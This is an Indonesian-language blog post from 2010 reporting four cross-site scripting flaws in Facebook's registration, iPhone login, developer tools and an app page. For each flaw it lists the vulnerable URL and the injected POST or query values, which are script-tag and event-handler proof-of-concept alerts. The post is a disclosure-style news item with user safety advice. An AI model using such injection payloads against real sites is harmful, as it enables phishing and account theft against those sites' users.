Friday, March 12, 2010

Empat Kelemahan XSS yang Cukup Kritis ditemukan di Facebook

By Sriudin sahrudin   Posted at  10:31 AM   No comments

Para pengguna Facebook rentan akan serangan phishing dan pencurian ID dikarenakan munculnya kelemahan cross-site scripting yang terbaru dan cukup kritis.


Peneliti keamanan Zeitjak, David Wharton, Daimon dan p3lo baru-baru ini menemukan cacat XSS yang berpengaruh terhadap beberapa fungsionalitas Facebook termasuk halaman developer, halaman registrasi pengguna baru, halaman login iphone dan halaman aplikasi.



Orang-orang jahat dapat mengeksploitasi bugs XSS ini untuk menginfeksi jutaan anggota Facebook dengan malware, adware dan spyware.

Biar aman, anda dianjurkan untuk tidak menerima friend invitation dari orang yang tidak anda kenal. Alasannya adalah bahwa profil di Facebook berisikan informasi pribadi yang cukup berharga untuk dipelajari oleh fraudster (teman anda yang tidak dikenal). Para teman yang tak 'diundang' ini bertujuan untuk melancarkan serangan phishing atau menyebarkan malware pada pengguna individual maupun bisnis. Bagaimana jika anda mengklik sebuah shared link atau apapun? Maka siap-siap saja privasi anda akan menjadi milik mereka!!!


Berikut ini keempat cacat XSS yang ditemukan, untuk mengetahui seperti apa cacatnya klik link bertuliskan Mirror:



XSS #1 dengan POST (oleh Zeitjak) | Mirror:


http://www.new.facebook.com/r.php


POST: reg_email__="onmouseover="alert('XSS - ZJ')"foo="bar


XSS #2 dengan POST (oleh David Wharton) | Mirror:



https://login.facebook.com/login.php?iphone&next=http%3A%2F%2Fiphone.fac...


POST:


email=biz%22%3E%3Cscript%3Ealert%28%27tohellwithgeorgia%27%29%3C%2Fscript%3E%3C%22&pass=greetz2evilghost&next=http%3A%2F%2Fiphone.facebook.com%2F&login=Login


XSS #3 (oleh DaiMon) | Mirror:



http://apps.facebook.com/blognetworks/searchpage.php?tag=%22%3E%3Cscript%3Ealert(%22DaiMon%22)%3C/script%3E


This one works on another IP (67.228.87.82) and can't be used for a worm, except a phishing one.


XSS #4 dengan POST (oleh p3lo) | Mirror:


http://developers.facebook.com/tools.php?fbml


POST:



profile=1299125444&position=wide&api_key=%27%22%3E%3C%2Ftitle%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EXSS+by+p3lo%3C%2Fh1%3E%3C%2Fmarquee%3E+&fbml=

About the Author

Nulla sagittis convallis arcu. Sed sed nunc. Curabitur consequat. Quisque metus enim, venenatis fermentum, mollis in, porta et, nibh. Duis vulputate elit in elit. Mauris dictum libero id justo.
View all posts by: BT9

0 komentar:

Back to top ↑
Connect with Us

What they says

© 2013 BLOG SI PALUI. WP Mythemeshop Converted by Bloggertheme9
Blogger templates. Proudly Powered by Blogger.